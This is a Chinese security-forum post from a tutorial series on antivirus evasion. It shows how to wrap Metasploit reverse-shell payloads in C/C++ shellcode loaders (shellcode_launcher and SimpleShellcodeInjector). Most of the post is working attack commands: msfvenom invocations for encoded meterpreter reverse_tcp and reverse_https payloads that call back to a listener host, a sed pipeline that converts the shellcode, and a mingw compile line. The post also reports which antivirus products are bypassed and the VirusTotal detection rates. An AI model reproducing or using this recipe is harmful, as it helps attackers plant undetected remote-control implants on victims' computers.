设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 shellcode免杀 远控免杀专题(28)-C、C++加载shellcode免杀(下) ...
返回列表 发新帖
查看: 2598|回复: 0

远控免杀专题(28)-C、C++加载shellcode免杀(下)

[复制链接]
caiH

22

主题

63

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2020-3-7 23:19:46 | 显示全部楼层 |阅读模式
本帖最后由 caiH 于 2020-3-7 23:25 编辑

远控免杀专题(28)-C、C++加载shellcode免杀(下)

⼀、C/C++加载shellcode免杀介绍
在此之前对各种常⻅免杀⼯具进⾏了介绍,也可以从中了解很多免杀⼯具的原理,很多都是使⽤
msfvenom⽣成shellcode,然后对shellcode进⾏混淆、编码等各种处理,最终再使⽤各种语⾔进⾏
编译或记在。⽽被⽤到的最多的语⾔就是C/C++C#python
这⾥我们介绍⼀下C/C++加载shellcode的⽅法,⼀般分为两种⽅式:
1C/C++源码+shellcode直接编译,其中对shellcode的执⾏可以使⽤函数指针执⾏、汇编指令执
⾏、申请动态内存等⽅式,且shellcode可进⾏⼀些加密混淆处理;
2、使⽤加载器加载C/C++代码,如shellcode_launcher之类。
在专题26和专题27中介绍了在源码中处理shellcode后再进⾏编译,需要⼿⼯修改代码或⼿⼯编译
⽂件,下⾯介绍两个⽐较成熟的C/C++程序加载器,免杀效果也是不错的。
⼆、使⽤shellcode加载器
2.1 使⽤shellcode_launcher(VT免杀率3/71)
shellcode加载器中效果最好使⽤较多的就是shellcode_launcher了。
https://github.com/clinicallyinane/shellcode_launcher/
使⽤⾮常简单,克隆到本地 git clone
https://github.com/clinicallyinane/shellcode_launcher/
其中的⽂件 shellcode_launcher.exe 就是要⽤到的加载器。
还是先⽤Msfvenom⽣成raw格式的shellcode

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b
'\x00' lhost=10.211.55.2 lport=3333 -f raw -o shellcode.raw

在测试机器上执⾏,杀软均⽆反应

shellcode_launcher.exe -i shellcode.raw


msf中可正常上线


virustotal.comshellcode.raw 查杀率为1/57


virustotal.comshellcode_launcher.exe 查杀率为3/71


2.2 使⽤SSI加载(VT免杀率6/69)
这⾥需要使⽤的加载器 https://github.com/DimopoulosElias/SimpleShellcodeInjector
先⽤msfvenom⽣成基于c语⾔的shellcode

msfvenom -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f c -o msf.txt

然后执⾏下⾯命令,会得到⼀串16进制字符串

cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed
':a;N;$!ba;s/\n//g'|sed "s/;//g"


然后在 SimpleShellcodeInjector ⽂件中,找到⽂件 SimpleShellcodeInjector.c 。使⽤命令
i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
 编译⽣成ssi.exe
如果没有安装 i686-w64-mingw32-gcc ,可在这⾥下
https://github.com/TideSec/BypassAntiVirus/tree/master/tools
其实在 SimpleShellcodeInjector\OLDBinary ⽂件中也有个ssi.exe,这是作者给编译好的,不过不
建议使⽤,因为这个ssi.exe已经能被很多杀软查杀,最好就是使⽤上⾯的命令⾃⼰编译⼀个。


使⽤编译⽣成的ssi.exe,参数为上⾯的16进制字符串,执⾏shellcode360和⽕绒的静态+动态查
杀都可bypass


msf可正常上线


virustotal.comssi.exe 查杀率为6/69


三、参考资料
Meterpreter免杀总结: https://carlstar.club/2019/01/04/dig/
shellcode加载总: https://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.html
浅谈meterpreter免杀: https://www.jianshu.com/p/9d2790f6c8aa








本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:39 , Processed in 0.013744 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表